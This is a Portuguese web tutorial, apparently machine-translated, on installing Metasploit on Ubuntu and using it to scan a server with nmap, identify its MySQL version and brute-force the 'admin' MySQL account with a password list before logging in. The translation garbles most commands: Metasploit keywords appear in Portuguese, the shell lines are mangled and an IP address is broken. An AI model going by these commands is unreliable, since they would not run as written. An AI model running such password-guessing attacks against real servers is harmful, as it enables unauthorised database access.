Framework Metasploit para testar a segurança do servidor

Índice
Framework Metasploit, é uma ferramenta para desenvolver e executar exploits contra um computador ou servidor. O Framework Metasploit foi escrito na linguagem Ruby, é multiplataforma e requer um computador potente para funcionar, existe uma versão paga e uma versão gratuita para a comunidade.
Ele pode ser baixado em www.metasploit.com/framework/download
Vamos instalar em Linux Ubutnu, mas funciona para outras distros alterando alguns comandos.
Acessamos a janela do terminal e instalamos o Ruby, antes funcionava com perl, mas foi programado completamente novo.
Instalamos as dependências do ruby ​​para que possamos executar o framework.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Então, dependendo da versão que baixarmos de 32 ou 64 bits do link do termo, daremos permissão:
chmod + x metasploit-latest-linux-x64-installer.run

Executamos o instalador e a janela de instalação será aberta:
sudo metasploit-latest-linux-x64-installer.run

Vamos clicar no seguinte Fordward), definimos se ele vai ser instalado como um serviço e a porta que vai ocupar, por padrão ele usa o 3790.
No final da instalação a partir da janela do terminal e com acesso root, atualizamos o framework
com o comando:
msfupdate

Metasploit é um programa sem ambiente gráfico que roda integralmente no terminal. Acessamos o software do terminal com o comando:
msfconsole

Conhecendo o MSF internamente
MSF (Metasploit Framework) Está estruturado em uma série de módulos como:

Exploits Quais são os scripts e programas disponíveis no MSF e que podemos usar, eles são organizados por sistema operacional e categorias, por exemplo exploits / windows / browser / que são os exploits disponíveis para navegadores que rodam no Windows.

Cargas úteis: É a ação que será executada se a vulnerabilidade que estamos testando puder ser encontrada e explorada.

Auxiliar: os scripts auxiliares com funções diferentes, como auxiliary / scanner / portscan / tcp e usando este scanner de porta tcp, obteríamos o status da porta. Este script é uma alternativa ao Nmap.

Enconders: Eles estão codificando scripts para evitar alguns antivírus e antispammer.

Começamos um exemplo de teste, a partir do terminal que executamos:
./msfconsole

O prompt do Metsploit é msf> a partir daí vamos executar tudo e para sair basta digitar exit
Vamos começar escaneando um ip com nmap
msf> nmap -sV 190.155.80.110

Ativamos o módulo auxiliar para acessar as ferramentas de script que permitirão trabalhar no mysql. Também podemos ver a versão do módulo.

Nós verificamos a versão de mysql, por razões óbvias o ip é fictício e apenas para o exemplo:
 msf> auxiliar (mysql_version)> definir RHOSTS 190.155.80.110 // definir o ip msf remoto> definir RHOSTS 192.155.80.110 msf> auxiliar (mysql_version)> executar // verificar a versão do mysql 

Se for executado corretamente, pode retornar a versão do mysql:
[*] 190.155.80.110 está executando o Mysql5.0

Outro caso com o módulo de digitalização e tentativa de alterar o usuário root do mysql:
 msf> usar scanner / mysql / mysql_login msf> definir NOME DE USUÁRIO admin msf> definir PASS_FILE /tmp/keys.lst // arquivo de texto com chaves possíveis uma abaixo da outra msf> explorar 

Se funcionar, podemos entrar no mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Você vai ajudar o desenvolvimento do site, compartilhando a página com seus amigos

wave wave wave wave wave